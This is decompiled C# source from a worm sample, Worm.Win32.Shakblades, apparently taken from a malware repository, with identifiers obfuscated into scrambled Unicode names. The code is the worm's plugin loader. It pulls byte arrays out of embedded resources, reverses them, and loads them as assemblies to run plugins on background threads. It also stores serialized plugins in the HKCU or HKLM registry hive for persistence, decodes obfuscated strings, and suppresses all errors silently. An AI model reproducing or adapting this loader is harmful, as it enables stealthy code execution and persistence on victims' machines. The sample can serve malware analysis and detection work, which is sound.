// Decompiled with JetBrains decompiler // Type: Ҧ߲๒ʽ໙ୄᴘ.ᙐᗡѬᵲ૦ᵛଔѥቾ // Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe using Microsoft.Win32; using Plugin; using System; using System.Collections.Generic; using System.IO; using System.Reflection; using System.Resources; using System.Runtime.Serialization.Formatters.Binary; using System.Threading; namespace Ҧ߲๒ʽ໙ୄᴘ { public class ᙐᗡѬᵲ૦ᵛଔѥቾ { public static SortedList \u0382Ⴊ\u19CD\u0DF1в = new SortedList(); public static SortedList රᓙ = new SortedList(); private static string \u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty; public static event ᙐᗡѬᵲ૦ᵛଔѥቾ.ᘕঃ \u0C11\u0FBFᵥރតൃĚŹᗐ; public static void ᇎ() { try { BinaryFormatter binaryFormatter = new BinaryFormatter(); MemoryStream serializationStream = new MemoryStream(); binaryFormatter.Serialize((Stream) serializationStream, (object) ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в); serializationStream.Close(); byte[] numArray = \u1928ᔾዔ.ᅀძṶၠ(serializationStream.ToArray(), false); if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser) Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A, (object) numArray); else Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A, (object) numArray); } catch { } } public static void ʉᆖͧ\u05CB\u00A9ᤤդܛ() => new Thread((ThreadStart) (() => { try { BinaryFormatter binaryFormatter = new BinaryFormatter(); MemoryStream memoryStream; byte[] numArray1; if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser) { MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.ᖝሇᬐ\u09D1য়᪷(Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A) as byte[], false)); ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList; serializationStream.Close(); serializationStream.Dispose(); memoryStream = (MemoryStream) null; numArray1 = (byte[]) null; } else { MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.ᖝሇᬐ\u09D1য়᪷(Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A) as byte[], false)); ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList; serializationStream.Close(); serializationStream.Dispose(); memoryStream = (MemoryStream) null; numArray1 = (byte[]) null; } foreach (byte[] numArray2 in (IEnumerable) ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Values) ᙐᗡѬᵲ૦ᵛଔѥቾ.ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(numArray2); } catch { } })).Start(); public static void dz() => new Thread((ThreadStart) (() => { try { if (Assembly.GetExecutingAssembly().GetManifestResourceNames().Length == 0) return; ResourceManager resourceManager = new ResourceManager("p", Assembly.GetExecutingAssembly()); int num = (int) resourceManager.GetObject("Len"); for (int index = 0; index < num; ++index) { byte[] numArray = (byte[]) resourceManager.GetObject(index.ToString()); Array.Reverse((Array) numArray); ᙐᗡѬᵲ૦ᵛଔѥቾ.ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(numArray); } if (!ȩזြڹᡡỾỔው.ጅũކᠾߠጇᔰᏫ) return; ᙐᗡѬᵲ૦ᵛଔѥቾ.ᇎ(); } catch (Exception ex) { Console.WriteLine(ex.Message); } })).Start(); public static bool ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(byte[] _param0) { try { foreach (Type type in Assembly.Load(_param0).GetTypes()) { int num = 0; if (type.IsClass && type.IsSubclassOf(typeof (IPlugin))) { IPlugin instance = (IPlugin) Activator.CreateInstance(type); if (instance.ExecuteOnLoad) { instance.Initialize(); ᙐᗡѬᵲ૦ᵛଔѥቾ.ᄄĐἮᥪ᭫ᘙȃই((object) null, instance, instance.ExecuteOnLoadArgs); } if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.ContainsKey(instance.Guid)) ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Add(instance.Guid, _param0); else ++num; if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(instance.Guid)) ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Add(instance.Guid, instance); else ++num; ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty; if (num == 2) { ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = instance.Name + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true); return false; } if (ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null) ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, instance); return true; } } ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("dp+UpqZTqpynm1N8g5+ompyhUzOdE72coaeYpZmUlphToaKnU5miqKGXYQ==", true); } catch (Exception ex) { Console.WriteLine(ex.Message); ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = ex.Message; } return false; } public static bool ᓒኞᣆќᆈࡏಒ\u0B76ୁ(IPlugin _param0) { if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(_param0.Guid)) { ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Add(_param0.Guid, _param0); ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty; if (ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null) ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, _param0); return true; } ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = _param0.Name + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true); return false; } public static void \u136Eᐰ\u1CAA\u0EE1ள(Guid _param0) { if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(_param0)) return; ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Remove(_param0); ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Remove(_param0); } public static string \u0CC0() => ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ; public static void ᄄĐἮᥪ᭫ᘙȃই(object ඳ, IPlugin _param1, PluginArgs _param2) => new Thread((ThreadStart) (() => { try { _param1.Execute(ඳ, _param2); } catch (Exception ex) { Console.WriteLine(ex.Message); } })).Start(); public static void ፂ\u0ECFȐفᅵټ༵୩() { try { if (!ȩזြڹᡡỾỔው.ጅũކᠾߠጇᔰᏫ) return; if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser) Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A); else Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A); } catch { } } public delegate void ᘕঃ(object sender, IPlugin plugin); } }